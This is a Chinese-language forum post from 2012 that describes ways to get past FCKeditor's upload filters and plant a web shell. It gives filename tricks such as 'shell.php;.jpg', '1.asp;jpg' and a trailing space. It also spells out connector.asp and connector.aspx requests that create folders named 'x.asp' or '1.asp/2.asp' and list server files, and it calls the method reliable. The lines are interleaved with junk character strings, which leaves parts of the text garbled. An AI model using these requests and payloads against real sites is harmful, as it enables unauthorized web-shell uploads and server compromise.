很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg0 J( Z! U7 D+ U; c- s9 ^
& z# H% R& I& o. w) f提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。
. ?! Q! j+ E, X( |2 Q7 u, E& k3 y- a2 w
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
9 v' Q a; _. B, X3 B7 z5 O
8 _8 ]1 e# P b, G) `8 g突破建立文件夹:( [* Z" A4 K# C) U
6 R" K* R/ v- Ieditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp' \2 W- _3 k* {( c8 |5 s: ?
+ M4 @ Z+ X* ] F; B
参数:6 R2 |' w4 l9 q, g, v1 \( x: ?0 P
; x; t9 _9 l' K) E
当前目录名:CurrentFolder=/qing.asp
9 L# o4 z5 z' D, D0 a1 m9 t" Y k% d: i8 s* ]9 \' V. F. V& Y
新的目录名:NewFolderName=x.asp
$ {$ e5 ]3 x$ P5 _
! X/ j$ F+ [! G0 C( M) t其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
% p0 b5 M' M+ L2 ~3 [, ~( A' z8 Z. l/ ^7 v6 ~( g4 ?8 E
那么 x.asp 就已经建立生成了,此方法百试百灵!
2 r# x) J1 U$ }% e7 v
( A4 \9 E3 E% k* i7 H( L" v( g6 D& ^新建文件夹参数 x.asp,基本都能搞定。
- U& C- l0 B: [0 A, I# ]6 s7 r" | L: b" x: ?
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建5 y4 `/ O0 c0 d
( i6 p) t3 U# Waspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp& c4 X3 z0 X! k8 U+ R
0 G* ?: \. v( T) C$ T
获取文件列表' F! O8 F* ^) W. d
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F8 L9 B1 I [) `; a8 A6 J9 e: l
" o( e5 a0 M2 n/ j+ X8 w8 E1 B a7 o |
发表于 2012-12-31 09:27:09
收藏
支持
反对